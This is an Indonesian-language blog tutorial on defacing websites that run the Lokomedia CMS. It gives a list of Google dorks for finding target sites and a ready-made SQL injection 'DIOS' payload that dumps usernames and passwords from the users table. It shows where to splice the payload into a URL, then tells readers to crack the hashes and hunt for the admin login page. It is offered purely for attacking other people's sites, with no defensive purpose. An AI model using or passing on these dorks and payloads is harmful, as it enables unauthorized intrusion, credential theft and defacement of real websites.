Deface Metode Sql Lokomedia

 

Deface Metode Sql Lokomedia. Hallo semuanya apa kabar? semoga baik" aja ya

oke di postinga saya kal ini saya akan memberikan tutorial cara deface metoded sql lokomedia

nah gimana caranya?

 yuk langsung aja ke tutorial nya

 

bahan" 

Dork : inurl:kategori-2-
inurl:kategori-40-
inurl:semua-berita.html
inurl:hal-tentang-kami.html
inurl:semua-agenda.html
inurl:statis-?-profil.html
inurl:statis-1-pengantar.html
inurl:statis-1/profil.html
inurl:statis-19-beasiswa.html
inurl:statis-22-kerjasama.html
inurl:kategori-23-hiburan.html
inurl:/statis-3-profil.html
inurl:statis-2/visi-dan-misi.html

 Dios : 'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-

 

dorking pake dork di atas 

 


 

Jika sudah kalian pilih salah satu website

Lalu kalian masukan dios nya di depan angka nya


contoh : https://www.com/kategori-23-blalba.html

nah kalian masukan dios nya di depan angka

jadi seperti ini

https://www.com/kategori-'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-23-blabla.html


Nah jika berhasil maka titile nya akan berubah menjadi username dan password website tersebut

untuk melihat nya kalian cukup view-source atau bisa juga CTRL+U


Jika sudah kalian hash terserah mau hash di mana 

kalo gw di sini di hashes


Jika sudah kalian klik sumbit


 nah jika sudah kalian tinggal cari admin loginya saja

banyak kok tools admin finder

oke mungkin itu saja tutorial singkat dari saya jika kurang paham silahkan comment di bawah

jangan lupa share ke temen temen kalian ya


see you next post :)

Mine7
Mine7 Lonely In My Bed And Never Know About Outside World

No comments for "Deface Metode Sql Lokomedia"